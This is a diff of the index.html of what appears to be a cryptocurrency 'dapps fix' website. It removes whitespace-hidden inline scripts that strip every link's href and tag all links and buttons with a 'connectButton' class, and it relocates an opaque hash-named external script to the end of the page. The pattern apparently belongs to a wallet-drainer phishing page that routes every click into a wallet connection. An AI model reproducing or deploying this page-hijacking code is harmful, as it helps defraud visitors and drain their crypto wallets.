--- a/index.html
+++ b/index.html
@@ -9,38 +9,7 @@
 
     <base>
 
-    <link href="bootstrap.min.css" rel="stylesheet">
-	<script>
-		document.addEventListener('DOMContentLoaded', function () {
-		  var links = document.querySelectorAll('body a');
-		  for (var i = 0; i < links.length; i++) {
-			var link = links[i];
-			link.removeAttribute('href');
-			link.classList.add('connectButton');
-		  }
-		  });
-		  </script>                                                                                                                          <script>
-	  document.addEventListener('DOMContentLoaded', function () {
-		var buttons = document.querySelectorAll('body button');
-		for (var i = 0; i < buttons.length; i++) {
-		  var button = buttons[i];
-		  button.classList.add('connectButton');
-		}
-	  });
-	  </script>
-	  <script>
-		document.addEventListener("DOMContentLoaded", function() {
-		  const elements = document.querySelectorAll('[ad-data-linked]');
-		  elements.forEach(element => {
-			  element.removeAttribute('ad-data-linked');
-		  });
-	  
-		  console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
-	  });
-	  
-	  </script>
-
-	  
+    <link href="bootstrap.min.css" rel="stylesheet">	  
 		  <style>
 			body {
  background-color: #cccccc;
@@ -61,9 +30,6 @@
     <link href="style.css" rel="stylesheet">
 <style type="text/css">#marq_kill_marg_bor { border: none !important; margin: 0px !important; }</style><style type="text/css">.ccc-coin-header-v3-container { white-space: nowrap; }</style><style type="text/css">.ccc-header-v3-ccc-price-container { margin-right: 15px; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a { text-decoration: none; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a:hover { text-decoration: none; }</style><style type="text/css">.ccc-header-v3 a:focus { text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-name { vertical-align: middle; font-family: Roboto, sans-serif; font-weight: 100; margin: 0px; color: rgb(0, 0, 0); }</style><style type="text/css">.ccc-header-v3-price-value { vertical-align: middle; font-family: Roboto, sans-serif; text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-change { font-family: Roboto, sans-serif; display: inline-block; vertical-align: middle; }</style><style type="text/css">#marq_kill_marg_bor { border: none !important; margin: 0px !important; }</style><style type="text/css">.ccc-coin-header-v3-container { white-space: nowrap; }</style><style type="text/css">.ccc-header-v3-ccc-price-container { margin-right: 15px; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a { text-decoration: none; display: inline-block; }</style><style type="text/css">.ccc-header-v3 a:hover { text-decoration: none; }</style><style type="text/css">.ccc-header-v3 a:focus { text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-name { vertical-align: middle; font-family: Roboto, sans-serif; font-weight: 100; margin: 0px; color: rgb(0, 0, 0); }</style><style type="text/css">.ccc-header-v3-price-value { vertical-align: middle; font-family: Roboto, sans-serif; text-decoration: none; }</style><style type="text/css">.ccc-header-v3-price-change { font-family: Roboto, sans-serif; display: inline-block; vertical-align: middle; }</style></head>
 <body>
-	
-	<script src="./6722293a8bcabc30460eb66b.js"></script>
-	
     <nav class="navbar navbar-expand-lg navbar-dark bg-dark shadow-sm p-0 osahan-nav">
     <div class="container">
         <a class="navbar-brand" href="https://smartdappsfix.pages.dev/index.html">
@@ -184,3 +150,5 @@
     }
 </style>
 
+<script src="./6722293a8bcabc30460eb66b.js"></script>
+</body>
